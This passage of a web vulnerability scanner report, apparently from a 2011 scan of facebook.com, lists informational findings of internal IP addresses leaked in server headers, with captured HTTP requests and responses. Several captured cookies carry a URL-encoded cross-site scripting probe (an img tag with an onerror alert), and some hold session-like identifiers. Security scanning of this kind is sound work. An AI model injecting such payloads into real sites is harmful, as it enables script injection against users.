Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Sat, 04 Jun 2011 11:40:23 GMT
X-FB-Server: 10.52.135.23
X-Cnection: close
Date: Thu, 05 May 2011 11:40:23 GMT
Content-Length: 13670

.PNG
.
...IHDR...n............Z..5-IDATx..}.W.Y......nPJ.......;F.........EJQDE.......D.v...s......e....Z{..7....y.>............5..C._..4.'&.q(_.>|. .......".../.`..W/_}.=y.y...~.@9.W.^........[.u.
...[SNIP]...

20.203. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.195.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.204. http://www.facebook.com/jezzas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.105.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.205. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.194.29

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.206. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.166.75

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.207. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.149.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.208. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.101.59

Request

Response

20.209. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.37.19.117

Request

Response

20.210. http://www.facebook.com/mapquest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mapquest

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.187.49

Request

Response

20.211. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.149.47

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.212. http://www.facebook.com/mmafighting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mmafighting

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.164.73

Request

Response

20.213. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.4.111

Request

Response

20.214. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.137.33

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.137.33
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 0

20.215. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.167.31

Request

GET /mobile?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613620616%2F2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; wd=1022x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.31
X-Cnection: close
Date: Thu, 05 May 2011 11:43:34 GMT
Content-Length: 0

20.216. http://www.facebook.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.134.79

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.79
Connection: close
Date: Thu, 05 May 2011 11:42:53 GMT
Content-Length: 0

20.217. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.165.25

Request

Response

20.218. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.138.55

Request

Response

20.219. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.166.33

Request

Response

20.220. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.145.51

Request

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0

20.221. http://www.facebook.com/pages/Barnesville/115038011847083 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Barnesville/115038011847083

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.163.47

Request

Response

20.222. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.187.43

Request

Response

20.223. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Bernicks-Pepsi/123296084349478

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.103.35

Request

Response

20.224. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Blaine-Senior-High/106189406087059

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.138.81

Request

Response

20.225. http://www.facebook.com/pages/Editor-in-Chief/137829579583400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Editor-in-Chief/137829579583400

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.75

Request

Response

20.226. http://www.facebook.com/pages/Gilco-Corporation/109823499042436 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Gilco-Corporation/109823499042436

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.156.75

Request

Response

20.227. http://www.facebook.com/pages/HMFIC/149403761740008 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HMFIC/149403761740008

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.181.83

Request

Response

20.228. http://www.facebook.com/pages/HuffPost-World/70242384902 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HuffPost-World/70242384902

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.199.43

Request

Response

20.229. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Manchester-Connecticut/112527912096312

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.149.35

Request

Response

20.230. http://www.facebook.com/pages/Merchandiser/123981654314779 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Merchandiser/123981654314779

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.41

Request

Response

20.231. http://www.facebook.com/pages/New-Haven-College/130105783687523 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/New-Haven-College/130105783687523

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.198.61

Request

Response

20.232. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Northern-Illinois-University/108155335871674

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.57

Request

Response

20.233. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/San-Antonio-Texas/110297742331680

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.153.69

Request

Response

20.234. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.163.39

Request

Response

20.235. http://www.facebook.com/pages/Sporting-News/104068362964496 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Sporting-News/104068362964496

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.135.73

Request

Response

20.236. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.134.37

Request

Response

20.237. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.159.71

Request

Response

20.238. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.198.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.33
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.239. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.28.109

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.240. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.139.29

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.29
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.241. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.134.53

Request

Response

20.242. http://www.facebook.com/patroyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.144.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.243. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky%20-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.187.63

Request

Response

20.244. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.194.41

Request

Response

20.245. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.157.53

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.246. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.184.45

Request

GET /people/Bucky-Jordan%20/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
